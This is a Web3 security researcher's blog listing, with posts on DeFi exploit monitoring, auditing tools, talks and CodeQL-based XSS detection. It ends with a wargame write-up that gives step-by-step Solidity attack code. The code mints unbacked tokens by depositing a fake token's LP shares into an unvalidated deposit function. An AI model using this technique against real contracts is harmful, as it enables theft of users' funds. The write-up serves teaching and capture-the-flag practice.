Raz0r — Web3 Security

How We Detect DeFi Exploits in Under One Second

Shared some insights on how @DefimonAlerts works under the hood on the @Quicknode blog.

New on the Quicknode blog: @DecurityHQ's CTO on how Streams let them rebuild Defimon from polling to push, cut block latency from 2s to under 0.5s, and scale exploit detection across 8 chains with one engineer running the pipeline.https://t.co/qMXiJ8f7EN
— Quicknode (@Quicknode) April 23, 2026

24 April 2026
Keeping hackers out of your DeFi wallet

Took part in the latest episode of the Unseen Money podcast with Paul Amery and Timur Yunusov to discuss the current state of DeFi security. Tune in!

The decentralised finance (#DeFi) market is booming—but the world’s best hackers are on the prowl for new ways to steal your crypto tokens.

Listen to Arseny Reutov (@theRaz0r) of @decurityhq in the latest episode of #UnseenMoney from @newmoneyreview https://t.co/25ZCo7ri96
— New Money Review (@newmoneyreview) June 9, 2025

10 June 2025
New tool: tx-coverage

Finished a weekend project that may be useful for onchain vulnerability analysis of deployed smart contracts:

https://github.com/Decurity/tx-coverage

tx-coverage allows to reveal unused code of live smart contracts by collecting coverage from historical transactions.

With it you can discover code that was never executed onchain and may contain potential bugs.

7 May 2024
Building scalable monitoring infrastructure from scratch

Video and slides from my talk at TrustX 2023 in Istanbul about how we built https://defimon.xyz

2 December 2023
Upgradeable smart contracts security

Slides & video from my talk about the security of proxies in smart contracts at OFFZONE 2022

19 October 2022
Сушите вёсла #20

Принял участие в новом эпизоде подкаста “Сушите вёсла”, посвященном блокчейну, смарт-контрактам и их безопасности. Приятного прослушивания!

12 July 2022
contract-diff: find bugs in smart contract forks

There has been plenty of hacks when a smart contract was forked and some things were changed without full understanding of the code.

To help auditors I have built https://contract-diff.xyz

This is how it works 🧵

For popular contracts like OpenZeppelin, Uniswap, Sushiswap, etc two kinds of hashes were computed: md5 hashsums & simhashes. Using hashsums we can find exact matches of contract sources. With simhashes it is possible to find contracts that are very similar to each other.

EtherScan does not verify the integrity of the included libs. With https://contract-diff.xyz you can quickly figure out which versions of libs are actually used. If a hashsum is not found in the database, but there is a contract with a similar simhash you will see a diff view.

One example is Uranium hack which was a fork of Uniswap v2:

https://twitter.com/RektHQ/status/1387399124090294276

Here you can see that there were mostly renamings but also an important change to the logic which led to $57,000,000 loss:

https://www.contract-diff.xyz/?address=0xa08c4571b395f81fbd3755d44eaf9a25c9399a4a&chain=1

I am planning to add more chains (currently only Ethereum mainnet & BSC) as well as support more contract flatenners (they are really weird). Will appreciate any feedback. Cheers!

Originally tweeted by Raz0r (@theRaz0r) on 16 February 2022.

16 February 2022
Безопасность web3: уязвимости на стыке блокчейна и веб-технологий

10 February 2022
Using CodeQL to detect client-side vulnerabilities in web applications

GitHub’s CodeQL is a robust query language originally developed by Semmle that allows you to look for vulnerabilities in the source code. CodeQL is known as a tool to inspect open source repositories, however its usage is not limited just to it. In this article I will delve into approaches on how to use CodeQL for web application audits, specifically to discover client-side vulnerabilities.

The idea of CodeQL is to treat source code as a database which can be queried using SQL-like statements. There are lots of languages supported among which is JavaScript. For JavaScript both server-side and client-side flavours are supported. JS CodeQL understands modern editions such as ES6 as well as frameworks like React (with JSX) and Angular.

CodeQL is not just grep as it supports taint tracking which allows you to test if a given user input (a source) can reach a vulnerable function (a sink). This is especially useful when dealing with DOM-based Cross Site Scripting vulnerabilities. By tainting a user-supplied DOM property such as location.hash one can test if this value actually reaches one of the XSS sinks, e.g. document.innerHTML or document.write().
(more…)

23 September 2021
DeFi Hack solutions: DiscoLP
This is a series of write-ups on DeFi Hack, a wargame based on real-world DeFi vulnerabilities. Other posts:

DeFi Hack solutions: May The Force Be With You

DiscoLP

DiscoLP is a brand new liquidity mining protocol! You can participate by depositing some JIMBO or JAMBO tokens. All liquidity will be supplied to JIMBO-JAMBO Uniswap pair. By providing liquidity with us you will get DISCO tokens in return!

The goal of this level was to get at least 100 DISCO tokens having only 1 JIMBO and 1 JAMBO. The target contract DiscoLP had only one public function named “deposit” with an explicit statement in the comments:

// accepts only JIMBO or JAMBO tokens

Uniswap is designed in such a way that one has to deposit a pair of tokens in the same proportions, but this function allowed to stake a single token swapping half of the value for the second token. In return LP shares were awarded. This level is a replica of the rAAVE farming contract hack that happened in February, 2021. As you may guess, the depositToken() function was not limited to JIMBO or JAMBO tokens, but actually accepted any token, there was no validation of the _token argument. It means that literally any token could have been staked that allowed to mint DISCO out of thin air. Although the cause is simple, the attack execution requires multiple steps.

First of all, an attacker has to create an arbitrary token:
```
Token evil = new Token("Evil Token", "EVIL"); // Token is ERC20
```
After that attacker approves unlimited EVIL spending to the instance of the level and to the Uniswap router:
```
evil.approve(instance, 2**256 - 1);
evil.approve(_router, 2**256 - 1);
```
The goal of the whole attack is to get some fake LP shares after providing liquidity to the Uniswap pair with JIMBO and attacker’s EVIL token in place of JAMBO. The attacker also approves spending of JIMBO to the Uniswap router, so that the swap in the depositToken() function succeeds:
```
IERC20(tokenA).approve(_router, 2**256 - 1);
```
After that a JIMBO-EVIL Uniswap pair is created:
```
address pair = IUniswapV2Factory(_factory).createPair(address(evil), address(tokenA));
```
After transfering a single JIMBO token that we have to the attacker contract, we add liquidity to the created pool:
```
(uint256 amountA, uint256 amountB, uint256 _shares) = IUniswapV2Router(_router).addLiquidity(
  address(evil),
  address(tokenA),
  100000000000 * 10 ** 18, // EVIL liquidity
  1 * 10 ** 18,            // 1 JIMBO
  1, 1, 
  address(this), // address to send LP shares (attacker contract)
  2**256 - 1);
```
Finally we deposit fake LP shares to DiscoLP contract:
```
DiscoLP(instance).depositToken(address(evil), amount, 1);
```
After swapping zero-value EVIL tokens, we get plenty of DiscoLP shares! You can find the full source code of the attack contract here: https://github.com/Raz0r/defihack/blob/master/contracts/attacks/DiscoLPAttack.sol
18 June 2021